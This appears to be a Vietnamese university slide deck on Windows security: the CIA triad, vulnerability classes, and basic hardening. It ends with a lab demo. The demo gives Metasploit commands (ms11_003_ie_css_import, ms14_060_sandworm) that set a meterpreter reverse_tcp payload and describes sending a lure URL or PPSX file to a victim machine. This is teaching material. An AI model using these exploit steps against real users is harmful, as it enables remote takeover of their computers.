Tải bản đầy đủ (.pptx) (60 trang)

Nhận dạng các nguy cơ, điểm yếu và lỗ hổng bảo mật và biện pháp bảo mật trong hệ thống Microsoft Windows

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (3.83 MB, 60 trang )

CHỦ ĐỀ:

Nhận dạng các nguy cơ, điểm yếu và lỗ
hổng bảo mật trong hệ thống Microsoft
Windows và các biện pháp đảm bảo an
toàn trong hệ thống Microsoft Windows
THỰC HIỆN:

Nguyễn Hoàn Nam Dương PTIT


1. CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ
THỐNG MICROSOFT WINDOWS.

BỘ 3 BẢO MẬT BAO GỒM 3 NGUYÊN TẮC BẢO MẬT CHÍNH:

- TÍNH BẢO MẬT (CONFIDENTIALITY)
- TÍNH TOÀN VẸN (INTEGRITY)
- TÍNH KHẢ DỤNG (AVAILABILITY)


1. CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG
MICROSOFT WINDOWS.

Hình 1.2 – Trang 28/MicrosoftWindows-Security-Essentials

3


1. CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG
MICROSOFT WINDOWS.


BẢO MẬT TÍNH BẢO MẬT:
- Thực hiện phương pháp kiểm soát truy cập để kiểm soát ai có thể truy cập
dữ liệu.
- Mã hóa một lớp bảo mật khác để bảo vệ chống mất tính bảo mật.
- Có thể mã hóa các tập riêng lẻ, toàn bộ ổ đĩa cứng và truyển dữ liệu đi qua
mạng.

4


1. CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG
MICROSOFT WINDOWS.
BẢO MẬT TÍNH KHẢ DỤNG:
- Mất tính khả dụng đơn giản là các hệ thống hoặc dữ liệu
không khả dụng khi người dùng cần chúng. Một hệ thống
phải hoạt động 24/7
- Đảm bảo rằng các hệ thống vẫn hoạt động bằng cách bảo vệ
chống lại các mối đe dọa khác nhau.
- Một trong mối đe dọa phổ biến nhất là virut, worms, trojan.
- Sao lưu dữ liệu là quan trọng
5


1. CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG
MICROSOFT WINDOWS.
BẢO MẬT TÍNH TOÀN VẸN
- Mất tính toàn vẹn xảy ra khi dữ liệu được sửa đổi mà không
được phép.
- Kiểm soát truy cập hoạt động để đảm bảo rằng những người
được ủy quyền mới có quyền truy cập.

- Ghi nhật kí kiểm tra có thể hiển thị nếu có ai truy cập dữ liệu
và có thể bao gồm các chi tiết họ là ai, và đã làm gì và thời gian
họ đã làm.
- Kiểm tra băm phát hiện khi dữ liệu mất tính toàn vẹn
6


2. PHÂN TÍCH, NHẬN DẠNG CÁC NGUY CƠ,
ĐIỂM YẾU VÀ LỖ HỔNG BẢO MẬT TRONG HỆ
THỐNG MICROSOFT WINDOWS


2.1. CÁC NGUYÊN NHÂN CÓ THỂ GÂY RA CÁC LỖ
HỔNG BẢO MẬT
 Lỗi của bản thân hệ điều hành ( lỗ hổng hệ thống tệp, lỗ

hổng chế độ tải, lỗ hổng trong các cơ chế quản lý tiến
trình..)

 Lỗ hổng từ các phần mềm, dịch vụ đi kèm bản phát hành

của hệ điều hành.

 Người quản trị hệ thống yêu kém không hiểu sâu sắc các

dịch vụ cung cấp, cấu hình không an toàn .

 Người sử dụng có ý thức bảo mật kém click vào các đường

link lạ hay tải về các ứng dụng độc hại, sử dụng mẫu khẩu

yếu.
8


2.2. PHÁT HIỆN LỖ HỔNG CỦA HỆ THỐNG THÔNG TIN

 Để phát hiện, xác định và đánh giá các lỗ hổng của

HTTT và loại bỏ chúng, người ta sử dụng các phương
tiện phân tích an toàn.
 Quá trình phát hiện lỗ hổng của HTTT được xây dựng
bằng cách thực hiện kiểm tra thụ động và kiểm tra
thăm dò tích cực (active probe) các lỗ hổng. 

9


Mô hình phát hiện lỗ hỏng tổng quát
10


2.3. CÁC LOẠI LỖ HỔNG BẢO MẬT
 Lỗ hổng loại C: mức độ nguy hiểm thấp chỉ ảnh hưởng tới chất lượng dịch

vụ, ngưng trệ gián đoạn hệ thống không phá hỏng dữ liệu hoặc đoạt được
quyền truy cập.

 Lỗ hổng loại B: mức độ nguy hiểm trung bình thường có trong các ứng dụng

trên hệ thông. Lỗ hổng này cho phép người dùng nội bộ có thể chiếm được

quyền cao hơn hay truy cập không hợp pháp

 Lỗ hổng loại A: cảnh báo nguy hiểm cho phép người ngoài hệ thống có thể

truy cập hợp pháp vào hệ thống dẫn đến phá hủy hệ thống. Nguyên nhân
của lỗ hổng này thường do quản trị yếu kém. Những lỗ hổng này có sẵn
trên phần mềm mà người quản trị không nhận biết.

11


 Hoặc phân theo lỗ hổng đã biết, là lỗ hổng đã được công bố, kèm theo các

biện pháp thích hợp để bảo vệ, các bản vá lỗi và bản cập nhật. Như vậy,
mỗi khi lỗ hổng được phát hiện thuộc loại này, thì vấn đề cũng coi như đã
được giải quyết.

 Lỗ hổng mà chỉ đến thời điểm phát hành bản cập nhật, hoặc phiên bản

mới của sản phẩm, nhà sản xuất mới biết về sự tồn tại của nó do không
đủ thời gian để nghiên cứu và khắc phục sản phẩm đã phát hành, nên các
lỗ hổng loại này được đặt tên là lỗ hổng zero-day, trong suốt thời gian kể
từ thời điểm tồn tại đến khi bị phát hiện, lỗ hổng này có thể đã được khai
thác trong thực tế

12


3. CÁC BIỆN PHÁP BẢO MẬT CHO MS WINDOWS



3. CÁC BIỆN PHÁP BẢO MẬT CƠ BẢN










Cài đặt các bản Security Update của hệ điều hành
Cài đặt các bản Security Update của chương trình
Cài đặt chương trình bảo mật có uy tín
Luôn cập nhật các chương trình bảo mật
Cài đặt ứng dụng Anti-Spyware / Adware / Malware
Truy cập Internet theo cách an toàn
Tạo mật khẩu rõ ràng và đảm bảo an toàn đối với từng tài khoản
Kiểm tra toàn bộ hệ thống thường xuyên theo định kỳ
Nếu môi trường doanh nghiệp ta nên có các hê thống theo dõi, giám sát để
sẵn sàng xử lý các vấn đề phát sinh.

Tuy nhiên, không hề có bất cứ phần mềm, ứng dụng hỗ trợ nào có thể đáp
ứng 100% nhu cầu bảo mật của người sử dụng. Mà bên cạnh đó, kinh nghiệm
trong quá trình sử dụng của chúng ta mới là yếu tố quyết định tất cả.
14


4. DEMO



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT
-

KỊCH BẢN KHAI THÁC MS11_003 :
Mục tiêu khai thác: Internet Explorer 6,7,8
Máy Attacker: Kali-Linux
Máy Victim : Windows 7.
Bằng cách sử dụng mô-đun Metasploit
ms11_003_ie_css_import trên KaLi.
Cài đặt và tạo ra một URL trên máy KaLi.
Đính kèm gửi làm mồi URL cho máy nạn nhân.

16


4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT
 IP KaLi: 192.168.255.130 && IP Victim: 192.168.255.131
 Sử dụng use exploit/windows/browser/ms11_003_ie_css_import
 IP Victim: 192.168.255.131

17


4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT
 Sử dụng Msf exploit (ms11_003_ie_css_import)>set payload

windows/meterpreter/reverse_tcp


 Cài đặt các tham số SRVHOST( địa chỉ máy cục bộ) và LHOST.

18


4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT
 Dùng lệnh exploit để chạy và tạo ra 1 URL . Copy URL và gửi cho Victim :

19


4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT
 Khi nạn nhân click vào đường link được attacker gửi. Bên máy Kali sẽ chạy được như

hình bên:

20


4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT

21


4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT
 Sau khi khai thác ta sẽ được kết quả:

22



4.2. CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM
KỊCH BẢN KHAI THÁC MS14-060
- Cho phép kẻ tấn công có thể thực thi mã từ xa trên hệ thống mục tiêu khi
một người dùng mở một tậptin có chứa các OLE object lừa đảo.
- OLE là công nghệ Object Linking and Embedding (OLE) của Mircrosoft
cho phép nội dung có thể liên kết bên trong các tài liệu.
- Máy Attacker : KaLi-Linux
- Máy Victim : Windows 7
- Bằng cách sừ dụng metasploit trên kali tạo ra file PPSX.
- Và chia sẻ cho file PPSX cho máy victim để lừa và mở ra.

23


4.2. CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM
 Sử dụng: exploit/windows/fileformat/ms14_060_sandworm

24


4.2. CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM
 Dùng payload: set payload windows/meterpreter/reverse_tcp

25


×